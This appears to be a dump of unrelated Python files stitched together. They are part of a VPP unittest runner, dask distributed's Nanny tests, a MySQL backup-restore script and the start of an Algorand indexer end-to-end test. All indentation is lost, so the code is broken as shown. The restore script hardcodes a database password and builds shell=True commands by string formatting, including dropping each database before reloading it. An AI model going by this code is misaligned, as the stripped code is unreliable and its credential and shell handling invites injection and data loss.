Set to the standard error stream by default.
:param descriptions Boolean variable to store information if to use
test case descriptions.
:param verbosity Integer variable to store required verbosity level.
"""
super(VppTestResult, self).__init__(stream, descriptions, verbosity)
self.stream = stream
self.descriptions = descriptions
self.verbosity = verbosity
self.result_string = None
self.runner = runner
self.printed = []
def addSuccess(self, test):
"""
Record a test succeeded result
:param test:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSuccess() %s.%s(%s) called" % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc))
unittest.TestResult.addSuccess(self, test)
self.result_string = colorize("OK", GREEN)
self.send_result_through_pipe(test, PASS)
def addSkip(self, test, reason):
"""
Record a test skipped.
:param test:
:param reason:
"""
if self.current_test_case_info:
self.current_test_case_info.logger.debug(
"--- addSkip() %s.%s(%s) called, reason is %s" %
(test.__class__.__name__, test._testMethodName,
test._testMethodDoc, reason))
unittest.TestResult.addSkip(self, test, reason)
self.result_string = colorize("SKIP", YELLOW)
if reason == "not enough cpus":
self.send_result_through_pipe(test, SKIP_CPU_SHORTAGE)
else:
self.send_result_through_pipe(test, SKIP)
def symlink_failed(self):
if self.current_test_case_info:
try:
failed_dir = config.failed_dir
link_path = os.path.join(
failed_dir,
'%s-FAILED' %
os.path.basename(self.current_test_case_info.tempdir))
self.current_test_case_info.logger.debug(
"creating a link to the failed test")
self.current_test_case_info.logger.debug(
"os.symlink(%s, %s)" %
(self.current_test_case_info.tempdir, link_path))
if os.path.exists(link_path):
self.current_test_case_info.logger.debug(
'symlink already exists')
else:
os.symlink(self.current_test_case_info.tempdir, link_path)
except Exception as e:
self.current_test_case_info.logger.error(e)
def send_result_through_pipe(self, test, result):
if hasattr(self, 'test_framework_result_pipe'):
pipe = self.test_framework_result_pipe
if pipe:
pipe.send((test.id(), result))
def log_error(self, test, err, fn_name):
if self.current_test_case_info:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = test.description
else:
test_name = '%s.%s(%s)' % (test.__class__.__name__,
test._testMethodName,
test._testMethodDoc)
self.current_test_case_info.logger.debug(
"--- %s() %s called, err is %s" %
(fn_name, test_name, err))
self.current_test_case_info.logger.debug(
"formatted exception is:\n%s" %
"".join(format_exception(*err)))
def add_error(self, test, err, unittest_fn, error_type):
if error_type == FAIL:
self.log_error(test, err, 'addFailure')
error_type_str = colorize("FAIL", RED)
elif error_type == ERROR:
self.log_error(test, err, 'addError')
error_type_str = colorize("ERROR", RED)
else:
raise Exception('Error type %s cannot be used to record an '
'error or a failure' % error_type)
unittest_fn(self, test, err)
if self.current_test_case_info:
self.result_string = "%s [ temp dir used by test case: %s ]" % \
(error_type_str,
self.current_test_case_info.tempdir)
self.symlink_failed()
self.failed_test_cases_info.add(self.current_test_case_info)
if is_core_present(self.current_test_case_info.tempdir):
if not self.current_test_case_info.core_crash_test:
if isinstance(test, unittest.suite._ErrorHolder):
test_name = str(test)
else:
test_name = "'{!s}' ({!s})".format(
get_testcase_doc_name(test), test.id())
self.current_test_case_info.core_crash_test = test_name
self.core_crash_test_cases_info.add(
self.current_test_case_info)
else:
self.result_string = '%s [no temp dir]' % error_type_str
self.send_result_through_pipe(test, error_type)
def addFailure(self, test, err):
"""
Record a test failed result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addFailure, FAIL)
def addError(self, test, err):
"""
Record a test error result
:param test:
:param err: error message
"""
self.add_error(test, err, unittest.TestResult.addError, ERROR)
def getDescription(self, test):
"""
Get test description
:param test:
:returns: test description
"""
return get_test_description(self.descriptions, test)
def startTest(self, test):
"""
Start a test
:param test:
"""
def print_header(test):
if test.__class__ in self.printed:
return
test_doc = getdoc(test)
if not test_doc:
raise Exception("No doc string for test '%s'" % test.id())
test_title = test_doc.splitlines()[0].rstrip()
test_title = colorize(test_title, GREEN)
if test.is_tagged_run_solo():
test_title = colorize(f"SOLO RUN: {test_title}", YELLOW)
# This block may overwrite the colorized title above,
# but we want this to stand out and be fixed
if test.has_tag(TestCaseTag.FIXME_VPP_WORKERS):
test_title = colorize(
f"FIXME with VPP workers: {test_title}", RED)
if test.has_tag(TestCaseTag.FIXME_ASAN):
test_title = colorize(
f"FIXME with ASAN: {test_title}", RED)
test.skip_fixme_asan()
if hasattr(test, 'vpp_worker_count'):
if test.vpp_worker_count == 0:
test_title += " [main thread only]"
elif test.vpp_worker_count == 1:
test_title += " [1 worker thread]"
else:
test_title += f" [{test.vpp_worker_count} worker threads]"
if test.__class__.skipped_due_to_cpu_lack:
test_title = colorize(
f"{test_title} [skipped - not enough cpus, "
f"required={test.__class__.get_cpus_required()}, "
f"available={max_vpp_cpus}]", YELLOW)
print(double_line_delim)
print(test_title)
print(double_line_delim)
self.printed.append(test.__class__)
print_header(test)
self.start_test = time.time()
unittest.TestResult.startTest(self, test)
if self.verbosity > 0:
self.stream.writeln(
"Starting " + self.getDescription(test) + " ...")
self.stream.writeln(single_line_delim)
def stopTest(self, test):
"""
Called when the given test has been run
:param test:
"""
unittest.TestResult.stopTest(self, test)
if self.verbosity > 0:
self.stream.writeln(single_line_delim)
self.stream.writeln("%-73s%s" % (self.getDescription(test),
self.result_string))
self.stream.writeln(single_line_delim)
else:
self.stream.writeln("%-68s %4.2f %s" %
(self.getDescription(test),
time.time() - self.start_test,
self.result_string))
self.send_result_through_pipe(test, TEST_RUN)
def printErrors(self):
"""
Print errors from running the test case
"""
if len(self.errors) > 0 or len(self.failures) > 0:
self.stream.writeln()
self.printErrorList('ERROR', self.errors)
self.printErrorList('FAIL', self.failures)
# ^^ that is the last output from unittest before summary
if not self.runner.print_summary:
devnull = unittest.runner._WritelnDecorator(open(os.devnull, 'w'))
self.stream = devnull
self.runner.stream = devnull
def printErrorList(self, flavour, errors):
"""
Print error list to the output stream together with error type
and test case description.
:param flavour: error type
:param errors: iterable errors
"""
for test, err in errors:
self.stream.writeln(double_line_delim)
self.stream.writeln("%s: %s" %
(flavour, self.getDescription(test)))
self.stream.writeln(single_line_delim)
self.stream.writeln("%s" % err)
class VppTestRunner(unittest.TextTestRunner):
"""
A basic test runner implementation which prints results to standard error.
"""
@property
def resultclass(self):
"""Class maintaining the results of the tests"""
return VppTestResult
def __init__(self, keep_alive_pipe=None, descriptions=True, verbosity=1,
result_pipe=None, failfast=False, buffer=False,
resultclass=None, print_summary=True, **kwargs):
# ignore stream setting here, use hard-coded stdout to be in sync
# with prints from VppTestCase methods ...
super(VppTestRunner, self).__init__(sys.stdout, descriptions,
verbosity, failfast, buffer,
resultclass, **kwargs)
KeepAliveReporter.pipe = keep_alive_pipe
self.orig_stream = self.stream
self.resultclass.test_framework_result_pipe = result_pipe
self.print_summary = print_summary
def _makeResult(self):
return self.resultclass(self.stream,
self.descriptions,
self.verbosity,
self)
def run(self, test):
"""
Run the tests
:param test:
"""
faulthandler.enable() # emit stack trace to stderr if killed by signal
result = super(VppTestRunner, self).run(test)
if not self.print_summary:
self.stream = self.orig_stream
result.stream = self.orig_stream
return result
class Worker(Thread):
def __init__(self, executable_args, logger, env=None, *args, **kwargs):
super(Worker, self).__init__(*args, **kwargs)
self.logger = logger
self.args = executable_args
if hasattr(self, 'testcase') and self.testcase.debug_all:
if self.testcase.debug_gdbserver:
# prepend gdbserver to the worker command line
self.args = ['/usr/bin/gdbserver', 'localhost:{port}'
             .format(port=self.testcase.gdbserver_port)] + executable_args
elif self.testcase.debug_gdb and hasattr(self, 'wait_for_gdb'):
self.args.append(self.wait_for_gdb)
self.app_bin = executable_args[0]
self.app_name = os.path.basename(self.app_bin)
if hasattr(self, 'role'):
self.app_name += ' {role}'.format(role=self.role)
self.process = None
self.result = None
env = {} if env is None else env
self.env = copy.deepcopy(env)
def wait_for_enter(self):
if not hasattr(self, 'testcase'):
return
if self.testcase.debug_all and self.testcase.debug_gdbserver:
print()
print(double_line_delim)
print("Spawned GDB Server for '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
elif self.testcase.debug_all and self.testcase.debug_gdb:
print()
print(double_line_delim)
print("Spawned '{app}' with PID: {pid}"
.format(app=self.app_name, pid=self.process.pid))
else:
return
print(single_line_delim)
print("You can debug '{app}' using:".format(app=self.app_name))
if self.testcase.debug_gdbserver:
print("sudo gdb " + self.app_bin +
" -ex 'target remote localhost:{port}'"
.format(port=self.testcase.gdbserver_port))
print("Now is the time to attach gdb by running the above "
"command, set up breakpoints etc., then resume from "
"within gdb by issuing the 'continue' command")
self.testcase.gdbserver_port += 1
elif self.testcase.debug_gdb:
print("sudo gdb " + self.app_bin +
" -ex 'attach {pid}'".format(pid=self.process.pid))
print("Now is the time to attach gdb by running the above "
"command and set up breakpoints etc., then resume from"
" within gdb by issuing the 'continue' command")
print(single_line_delim)
input("Press ENTER to continue running the testcase...")
def run(self):
executable = self.args[0]
if not os.path.exists(executable) or not os.access(
executable, os.F_OK | os.X_OK):
# Exit code that means some system file did not exist,
# could not be opened, or had some other kind of error.
self.result = os.EX_OSFILE
raise EnvironmentError(
"executable '%s' is not found or executable." % executable)
self.logger.debug("Running executable '{app}': '{cmd}'"
.format(app=self.app_name,
cmd=' '.join(self.args)))
env = os.environ.copy()
env.update(self.env)
env["CK_LOG_FILE_NAME"] = "-"
self.process = subprocess.Popen(
['stdbuf', '-o0', '-e0'] + self.args, shell=False, env=env,
preexec_fn=os.setpgrp, stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
self.wait_for_enter()
out, err = self.process.communicate()
self.logger.debug("Finished running `{app}'".format(app=self.app_name))
self.logger.info("Return code is `%s'" % self.process.returncode)
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stdout:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(out.decode('utf-8'))
self.logger.info(single_line_delim)
self.logger.info("Executable `{app}' wrote to stderr:"
.format(app=self.app_name))
self.logger.info(single_line_delim)
self.logger.info(err.decode('utf-8'))
self.logger.info(single_line_delim)
self.result = self.process.returncode
if __name__ == '__main__':
pass
|
test_nanny.py
|
import asyncio
import gc
import logging
import multiprocessing as mp
import os
import random
from contextlib import suppress
from time import sleep
import psutil
import pytest
from tlz import first, valmap
from tornado.ioloop import IOLoop
import dask
from distributed import Client, Nanny, Scheduler, Worker, rpc, wait, worker
from distributed.compatibility import LINUX, WINDOWS
from distributed.core import CommClosedError, Status
from distributed.diagnostics import SchedulerPlugin
from distributed.metrics import time
from distributed.protocol.pickle import dumps
from distributed.utils import TimeoutError, parse_ports, tmpfile
from distributed.utils_test import captured_logger, gen_cluster, gen_test, inc
# FIXME why does this leave behind unclosed Comm objects?
@gen_cluster(nthreads=[], allow_unclosed=True)
async def test_nanny(s):
async with Nanny(s.address, nthreads=2, loop=s.loop) as n:
async with rpc(n.address) as nn:
assert n.is_alive()
[ws] = s.workers.values()
assert ws.nthreads == 2
assert ws.nanny == n.address
await nn.kill()
assert not n.is_alive()
start = time()
while n.worker_address in s.workers:
assert time() < start + 1
await asyncio.sleep(0.01)
await nn.kill()
assert not n.is_alive()
assert n.worker_address not in s.workers
await nn.instantiate()
assert n.is_alive()
[ws] = s.workers.values()
assert ws.nthreads == 2
assert ws.nanny == n.address
await nn.terminate()
assert not n.is_alive()
@gen_cluster(nthreads=[])
async def test_many_kills(s):
n = await Nanny(s.address, nthreads=2, loop=s.loop)
assert n.is_alive()
await asyncio.gather(*(n.kill() for _ in range(5)))
await asyncio.gather(*(n.kill() for _ in range(5)))
await n.close()
@gen_cluster(Worker=Nanny)
async def test_str(s, a, b):
assert a.worker_address in str(a)
assert a.worker_address in repr(a)
assert str(a.nthreads) in str(a)
assert str(a.nthreads) in repr(a)
@gen_cluster(nthreads=[], client=True)
async def test_nanny_process_failure(c, s):
n = await Nanny(s.address, nthreads=2)
first_dir = n.worker_dir
assert os.path.exists(first_dir)
ww = rpc(n.worker_address)
await ww.update_data(data=valmap(dumps, {"x": 1, "y": 2}))
pid = n.pid
assert pid is not None
with suppress(CommClosedError):
await c.run(os._exit, 0, workers=[n.worker_address])
while n.pid == pid: # wait while process dies and comes back
await asyncio.sleep(0.01)
await asyncio.sleep(1)
while not n.is_alive(): # wait while process comes back
await asyncio.sleep(0.01)
# assert n.worker_address != original_address # most likely
while n.worker_address not in s.nthreads or n.worker_dir is None:
await asyncio.sleep(0.01)
second_dir = n.worker_dir
await n.close()
assert not os.path.exists(second_dir)
assert not os.path.exists(first_dir)
assert first_dir != n.worker_dir
await ww.close_rpc()
s.stop()
@gen_cluster(nthreads=[])
async def test_run(s):
n = await Nanny(s.address, nthreads=2, loop=s.loop)
with rpc(n.address) as nn:
response = await nn.run(function=dumps(lambda: 1))
assert response["status"] == "OK"
assert response["result"] == 1
await n.close()
@pytest.mark.slow
@gen_cluster(config={"distributed.comm.timeouts.connect": "1s"})
async def test_no_hang_when_scheduler_closes(s, a, b):
# https://github.com/dask/distributed/issues/2880
with captured_logger("tornado.application", logging.ERROR) as logger:
await s.close()
await asyncio.sleep(1.2)
assert a.status == Status.closed
assert b.status == Status.closed
out = logger.getvalue()
assert "Timed out trying to connect" not in out
@pytest.mark.slow
@gen_cluster(
Worker=Nanny, nthreads=[("127.0.0.1", 1)], worker_kwargs={"reconnect": False}
)
async def test_close_on_disconnect(s, w):
await s.close()
start = time()
while w.status != Status.closed:
await asyncio.sleep(0.05)
assert time() < start + 9
class Something(Worker):
# a subclass of Worker which is not Worker
pass
@gen_cluster(client=True, Worker=Nanny)
async def test_nanny_worker_class(c, s, w1, w2):
out = await c._run(lambda dask_worker=None: str(dask_worker.__class__))
assert "Worker" in list(out.values())[0]
assert w1.Worker is Worker
@gen_cluster(client=True, Worker=Nanny, worker_kwargs={"worker_class": Something})
async def test_nanny_alt_worker_class(c, s, w1, w2):
out = await c._run(lambda dask_worker=None: str(dask_worker.__class__))
assert "Something" in list(out.values())[0]
assert w1.Worker is Something
@pytest.mark.slow
@gen_cluster(nthreads=[])
async def test_nanny_death_timeout(s):
await s.close()
w = Nanny(s.address, death_timeout=1)
with pytest.raises(TimeoutError):
await w
assert w.status == Status.closed
@gen_cluster(client=True, Worker=Nanny)
async def test_random_seed(c, s, a, b):
async def check_func(func):
x = c.submit(func, 0, 2 ** 31, pure=False, workers=a.worker_address)
y = c.submit(func, 0, 2 ** 31, pure=False, workers=b.worker_address)
assert x.key != y.key
x = await x
y = await y
assert x != y
await check_func(lambda a, b: random.randint(a, b))
np = pytest.importorskip("numpy")
await check_func(lambda a, b: np.random.randint(a, b))
@pytest.mark.skipif(WINDOWS, reason="num_fds not supported on windows")
@gen_cluster(nthreads=[])
async def test_num_fds(s):
proc = psutil.Process()
# Warm up
w = await Nanny(s.address)
await w.close()
del w
gc.collect()
before = proc.num_fds()
for i in range(3):
w = await Nanny(s.address)
await asyncio.sleep(0.1)
await w.close()
while proc.num_fds() > before:
print("fds:", before, proc.num_fds())
await asyncio.sleep(0.1)
@pytest.mark.skipif(not LINUX, reason="Need 127.0.0.2 to mean localhost")
@gen_cluster(client=True, nthreads=[])
async def test_worker_uses_same_host_as_nanny(c, s):
for host in ["tcp://0.0.0.0", "tcp://127.0.0.2"]:
n = await Nanny(s.address, host=host)
def func(dask_worker):
return dask_worker.listener.listen_address
result = await c.run(func)
assert host in first(result.values())
await n.close()
@gen_test()
async def test_scheduler_file():
with tmpfile() as fn:
s = await Scheduler(scheduler_file=fn, port=8008)
w = await Nanny(scheduler_file=fn)
assert set(s.workers) == {w.worker_address}
await w.close()
s.stop()
@gen_cluster(client=True, Worker=Nanny, nthreads=[("127.0.0.1", 2)])
async def test_nanny_timeout(c, s, a):
x = await c.scatter(123)
with captured_logger(
logging.getLogger("distributed.nanny"), level=logging.ERROR
) as logger:
response = await a.restart(timeout=0.1)
out = logger.getvalue()
assert "timed out" in out.lower()
start = time()
while x.status != "cancelled":
await asyncio.sleep(0.1)
assert time() < start + 7
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
worker_kwargs={"memory_limit": "400 MiB"},
)
async def test_nanny_terminate(c, s, a):
def leak():
L = []
while True:
L.append(b"0" * 5_000_000)
sleep(0.01)
before = a.process.pid
with captured_logger(logging.getLogger("distributed.nanny")) as logger:
future = c.submit(leak)
while a.process.pid == before:
await asyncio.sleep(0.01)
out = logger.getvalue()
assert "restart" in out.lower()
assert "memory" in out.lower()
@gen_cluster(
nthreads=[("127.0.0.1", 1)] * 8,
client=True,
Worker=Worker,
clean_kwargs={"threads": False},
)
async def test_throttle_outgoing_connections(c, s, a, *workers):
# Put a bunch of small data on worker a
await c.run(lambda: logging.getLogger("distributed.worker").setLevel(logging.DEBUG))
remote_data = c.map(
lambda x: b"0" * 10000, range(10), pure=False, workers=[a.address]
)
await wait(remote_data)
def pause(dask_worker):
# Patch paused and memory_monitor on the one worker
# This is very fragile, since a refactor of memory_monitor to
# remove _memory_monitoring will break this test.
dask_worker._memory_monitoring = True
dask_worker.paused = True
dask_worker.outgoing_current_count = 2
await c.run(pause, workers=[a.address])
requests = [
await a.get_data(await w.rpc.connect(w.address), keys=[f.key], who=w.address)
for w in workers
for f in remote_data
]
await wait(requests)
wlogs = await c.get_worker_logs(workers=[a.address])
wlogs = "\n".join(x[1] for x in wlogs[a.address])
assert "throttling" in wlogs.lower()
@gen_cluster(nthreads=[], client=True)
async def test_avoid_memory_monitor_if_zero_limit(c, s):
nanny = await Nanny(s.address, loop=s.loop, memory_limit=0)
typ = await c.run(lambda dask_worker: type(dask_worker.data))
assert typ == {nanny.worker_address: dict}
pcs = await c.run(lambda dask_worker: list(dask_worker.periodic_callbacks))
assert "memory" not in pcs
assert "memory" not in nanny.periodic_callbacks
future = c.submit(inc, 1)
assert await future == 2
await asyncio.sleep(0.02)
await c.submit(inc, 2) # worker doesn't pause
await nanny.close()
@gen_cluster(nthreads=[], client=True)
async def test_scheduler_address_config(c, s):
with dask.config.set({"scheduler-address": s.address}):
nanny = await Nanny(loop=s.loop)
assert nanny.scheduler.address == s.address
start = time()
while not s.workers:
await asyncio.sleep(0.1)
assert time() < start + 10
await nanny.close()
@pytest.mark.slow
@gen_test()
async def test_wait_for_scheduler():
with captured_logger("distributed") as log:
w = Nanny("127.0.0.1:44737")
IOLoop.current().add_callback(w.start)
await asyncio.sleep(6)
await w.close()
log = log.getvalue()
assert "error" not in log.lower(), log
assert "restart" not in log.lower(), log
@gen_cluster(nthreads=[], client=True)
async def test_environment_variable(c, s):
a = Nanny(s.address, loop=s.loop, memory_limit=0, env={"FOO": "123"})
b = Nanny(s.address, loop=s.loop, memory_limit=0, env={"FOO": "456"})
await asyncio.gather(a, b)
results = await c.run(lambda: os.environ["FOO"])
assert results == {a.worker_address: "123", b.worker_address: "456"}
await asyncio.gather(a.close(), b.close())
@gen_cluster(nthreads=[], client=True)
async def test_data_types(c, s):
w = await Nanny(s.address, data=dict)
r = await c.run(lambda dask_worker: type(dask_worker.data))
assert r[w.worker_address] == dict
await w.close()
@gen_cluster(nthreads=[])
async def test_local_directory(s):
with tmpfile() as fn:
with dask.config.set(temporary_directory=fn):
w = await Nanny(s.address)
assert w.local_directory.startswith(fn)
assert "dask-worker-space" in w.local_directory
assert w.process.worker_dir.count("dask-worker-space") == 1
await w.close()
def _noop(x):
"""Define here because closures aren't pickleable."""
pass
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
config={"distributed.worker.daemon": False},
)
async def test_mp_process_worker_no_daemon(c, s, a):
def multiprocessing_worker():
p = mp.Process(target=_noop, args=(None,))
p.start()
p.join()
await c.submit(multiprocessing_worker)
@gen_cluster(
nthreads=[("127.0.0.1", 1)],
client=True,
Worker=Nanny,
config={"distributed.worker.daemon": False},
)
async def test_mp_pool_worker_no_daemon(c, s, a):
def pool_worker(world_size):
with mp.Pool(processes=world_size) as p:
p.map(_noop, range(world_size))
await c.submit(pool_worker, 4)
@pytest.mark.asyncio
async def test_nanny_closes_cleanly(cleanup):
async with Scheduler() as s:
n = await Nanny(s.address)
assert n.process.pid
proc = n.process.process
await n.close()
assert not n.process
assert not proc.is_alive()
assert proc.exitcode == 0
@pytest.mark.slow
@pytest.mark.asyncio
async def test_lifetime(cleanup):
counter = 0
event = asyncio.Event()
class Plugin(SchedulerPlugin):
def add_worker(self, **kwargs):
pass
def remove_worker(self, **kwargs):
nonlocal counter
counter += 1
if counter == 2: # wait twice, then trigger closing event
event.set()
async with Scheduler() as s:
s.add_plugin(Plugin())
async with Nanny(s.address) as a:
async with Nanny(s.address, lifetime="500 ms", lifetime_restart=True) as b:
await event.wait()
@pytest.mark.asyncio
async def test_nanny_closes_cleanly_2(cleanup):
async with Scheduler() as s:
async with Nanny(s.address) as n:
async with Client(s.address, asynchronous=True) as client:
with client.rpc(n.worker_address) as w:
IOLoop.current().add_callback(w.terminate)
start = time()
while n.status != Status.closed:
await asyncio.sleep(0.01)
assert time() < start + 5
assert n.status == Status.closed
@pytest.mark.asyncio
async def test_config(cleanup):
async with Scheduler() as s:
async with Nanny(s.address, config={"foo": "bar"}) as n:
async with Client(s.address, asynchronous=True) as client:
config = await client.run(dask.config.get, "foo")
assert config[n.worker_address] == "bar"
@pytest.mark.asyncio
async def test_nanny_port_range(cleanup):
async with Scheduler() as s:
async with Client(s.address, asynchronous=True) as client:
nanny_port = "9867:9868"
worker_port = "9869:9870"
async with Nanny(s.address, port=nanny_port, worker_port=worker_port) as n1:
assert n1.port == 9867 # Selects first port in range
async with Nanny(
s.address, port=nanny_port, worker_port=worker_port
) as n2:
assert n2.port == 9868 # Selects next port in range
with pytest.raises(
ValueError, match="Could not start Nanny"
): # No more ports left
async with Nanny(
s.address, port=nanny_port, worker_port=worker_port
):
pass
# Ensure Worker ports are in worker_port range
def get_worker_port(dask_worker):
return dask_worker.port
worker_ports = await client.run(get_worker_port)
assert list(worker_ports.values()) == parse_ports(worker_port)
class KeyboardInterruptWorker(worker.Worker):
"""A Worker that raises KeyboardInterrupt almost immediately"""
async def heartbeat(self):
def raise_err():
raise KeyboardInterrupt()
self.loop.add_callback(raise_err)
@pytest.mark.parametrize("protocol", ["tcp", "ucx"])
@pytest.mark.asyncio
async def test_nanny_closed_by_keyboard_interrupt(cleanup, protocol):
if protocol == "ucx": # Skip if UCX isn't available
pytest.importorskip("ucp")
async with Scheduler(protocol=protocol) as s:
async with Nanny(
s.address, nthreads=1, worker_class=KeyboardInterruptWorker
) as n:
n.auto_restart = False
await n.process.stopped.wait()
# Check that the scheduler has been notified about the closed worker
assert len(s.workers) == 0
class StartException(Exception):
pass
class BrokenWorker(worker.Worker):
async def start(self):
raise StartException("broken")
@pytest.mark.asyncio
async def test_worker_start_exception(cleanup):
# make sure this raises the right Exception:
with pytest.raises(StartException):
async with Nanny("tcp://localhost:1", worker_class=BrokenWorker) as n:
await n.start()
@pytest.mark.asyncio
async def test_failure_during_worker_initialization(cleanup):
with captured_logger(logger="distributed.nanny", level=logging.WARNING) as logs:
async with Scheduler() as s:
with pytest.raises(Exception):
async with Nanny(s.address, foo="bar") as n:
await n
assert "Restarting worker" not in logs.getvalue()
|
recover.py
|
#!/usr/bin/python
import time,sys,threading,os
import subprocess as sub
user='dbuser'
pwd='123456'
path="/root/python/test/bak"
t=1
dbnamelist=[]
dblist=[]
class Mainfunc():
def __init__(self,cmd):
self.cmd=cmd
def subcommand(self):
try:
ret = sub.Popen(self.cmd, shell=True, stdout=sub.PIPE, stderr=sub.PIPE)
out, err = ret.communicate()  # communicate() avoids deadlock on full pipe buffers
if err:
    print("Something went wrong, the reason is: %s" % err.decode('gb2312'))
except Exception as f:
print(f)
cmd = "gunzip %s/*.sql.gz " % path
un = Mainfunc(cmd)
#print("All of things will be unziped...")
un.subcommand()
#print("Fininshed!!!")
sourcelist=os.listdir(path)
def get_dbname():
for i in sourcelist:
dbname,*m = i.split('.')
dbnamelist.append(dbname)
print(dbnamelist)
for db in dbnamelist:
cmd = "cat list.txt| grep %s | awk '{print $8 }'" % db
child = sub.Popen(cmd,shell=True,stdout=sub.PIPE)
res = child.stdout.read().decode('gb2312')
if res == '':
print("Cannot find %s in list.txt..."% db)
else:
dblist.append(res.replace('\n',''))
def sqlcommand():
try:
for dbname, host, source in zip(dbnamelist, dblist, sourcelist):
    sqlconnect = "mysql -u%s -h%s -p%s" % (user, host, pwd)
    sqlcmd = [sqlconnect + " -e 'drop database if exists %s;'" % dbname,
              sqlconnect + " < %s/%s " % (path, source)]
for s in sqlcmd:
recov = Mainfunc(s)
recov.subcommand()
global t
t = 0.01
except Exception as f:
print(f)
def view_bar():
try:
for i in range(0,101):
time.sleep(t)
rate = i /100
rate_num= int(rate*100)
r = '\r[%s%s]%d%%' %("="*i," "*(100-i),rate_num)
sys.stdout.write(r)
sys.stdout.flush()
print()
except Exception as f :
print(f)
def mupt():
thlist=[]
s = threading.Thread(target=sqlcommand)
v = threading.Thread(target=view_bar)
s.start()
v.daemon = True
v.start()
s.join()
if __name__=="__main__":
get_dbname()
mupt()
|
e2elive.py
|
#!/usr/bin/env python3
#
import atexit
import glob
import gzip
import io
import json
import logging
import os
import random
import sqlite3
import subprocess
import sys
import tempfile
import threading
import time
import urllib.request
from util import xrun, atexitrun, find_indexer, ensure_test_db, firstFromS3Prefix
logger = logging.getLogger(__name__)
def main():
start = time.time()
import argparse
ap = argparse.ArgumentParser()
ap.add_argument('--keep-temps', default=False, action='store_true')
ap.add_argument('--indexer-bin', default=None, help='path to algorand-indexer binary, otherwise search PATH')
ap.add_argument('--indexer-port', default=None, type=int, help='port to run indexer on. defaults to random in [4000,30000]')
ap.add_argument('--connection-string', help='Use this connection string instead of attempting to manage a local database.')
ap.add_argument('--source-net', help='Path to test network directory containing Primary and other nodes. May be a tar file.')
ap.add_argument('--verbose', default=False, action='store_true')
args = ap.parse_args()
if args.verbose:
logging.basicConfig(level=logging.DEBUG)
else:
logging.basicConfig(level=logging.INFO)
indexer_bin = find_indexer(args.indexer_bin)
sourcenet = args.source_net
source_is_tar = False
if not sourcenet:
e2edata = os.getenv('E2EDATA')
sourcenet = e2edata and os.path.join(e2edata, 'net')
if sourcenet and hassuffix(sourcenet, '.tar', '.tar.gz', '.tar.bz2', '.tar.xz'):
source_is_tar = True
tdir = tempfile.TemporaryDirectory()
if not args.keep_temps:
atexit.register(tdir.cleanup)
else:
logger.info("leaving temp dir %r", tdir.name)
if not (source_is_tar or (sourcenet and os.path.isdir(sourcenet))):
# fetch test data from S3
bucket = 'algorand-testdata'
import boto3
from botocore.config import Config
from botocore import UNSIGNED
s3 = boto3.client('s3', config=Config(signature_version=UNSIGNED))
tarname = 'net_done.tar.bz2'
tarpath = os.path.join(tdir.name, tarname)
firstFromS3Prefix(s3, bucket, 'indexer/e2e2', tarname, outpath=tarpath)
source_is_tar = True
sourcenet = tarpath
tempnet = os.path.join(tdir.name, 'net')
if source_is_tar:
xrun(['tar', '-C', tdir.name, '-x', '-f', sourcenet])
else:
xrun(['rsync', '-a', sourcenet + '/', tempnet + '/'])
blockfiles = glob.glob(os.path.join(tdir.name, 'net', 'Primary', '*', '*.block.sqlite'))
lastblock = countblocks(blockfiles[0])
#subprocess.run(['find', tempnet, '-type', 'f'])
xrun(['goal', 'network', 'start', '-r', tempnet])
atexitrun(['goal', 'network', 'stop', '-r', tempnet])
psqlstring = ensure_test_db(args.connection_string, args.keep_temps)
algoddir = os.path.join(tempnet, 'Primary')
aiport = args.indexer_port or random.randint(4000,30000)
cmd = [indexer_bin, 'daemon', '-P', psqlstring, '--dev-mode', '--algod', algoddir, '--server', ':{}'.format(aiport)]
logger.debug("%s", ' '.join(map(repr,cmd)))
indexerdp = subprocess.Popen(cmd, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
indexerout = subslurp(indexerdp.stdout)
indexerout.start()
atexit.register(indexerdp.kill)
time.sleep(0.2)
indexerurl = 'http://localhost:{}/'.format(aiport)
healthurl = indexerurl + 'health'
for attempt in range(20):
ok = tryhealthurl(healthurl, args.verbose, waitforround=lastblock)
if ok:
break
time.sleep(0.5)
if not ok:
logger.error('could not get indexer health')
sys.stderr.write(indexerout.dump())
return 1
try:
xrun(['python3', 'misc/validate_accounting.py', '--verbose', '--algod', algoddir, '--indexer', indexerurl], timeout=20)
xrun(['go', 'run', 'cmd/e2equeries/main.go', '-pg', psqlstring, '-q'], timeout=15)
except Exception:
sys.stderr.write(indexerout.dump())
raise
dt = time.time() - start
sys.stdout.write("indexer e2etest OK ({:.1f}s)\n".format(dt))
return 0
def hassuffix(x, *suffixes):
for s in suffixes:
if x.endswith(s):
return True
return False
def countblocks(path):
db = sqlite3.connect(path)
cursor = db.cursor()
cursor.execute("SELECT max(rnd) FROM blocks")
row = cursor.fetchone()
cursor.close()
db.close()
return row[0]
def tryhealthurl(healthurl, verbose=False, waitforround=100):
try:
response = urllib.request.urlopen(healthurl)
if response.code != 200:
return False
raw = response.read()
logger.debug('health %r', raw)
ob = json.loads(raw)
rt = ob.get('message')
if not rt:
return False
return int(rt) >= waitforround
except Exception as e:
if verbose:
logging.warning('GET %s %s', healthurl, e, exc_info=True)
return False
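# Hedged note: the health endpoint is assumed here to return JSON whose
# "message" field holds the latest round as a string, e.g. b'{"message": "42"}';
# tryhealthurl() then reports healthy once that round reaches `waitforround`.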
class subslurp:
# asynchronously accumulate stdout or stderr from a subprocess and hold it for debugging if something goes wrong
def __init__(self, f):
self.f = f
self.buf = io.BytesIO()
self.gz = gzip.open(self.buf, 'wb')
self.l = threading.Lock()
self.t = None
def run(self):
for line in self.f:
with self.l:
if self.gz is None:
return
self.gz.write(line)
def dump(self):
with self.l:
self.gz.close()
self.gz = None
self.buf.seek(0)
r = gzip.open(self.buf, 'rt')
return r.read()
def start(self):
self.t = threading.Thread(target=self.run)
self.t.daemon = True
self.t.start()
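# Illustrative sketch (not part of the test flow): subslurp gzip-buffers a
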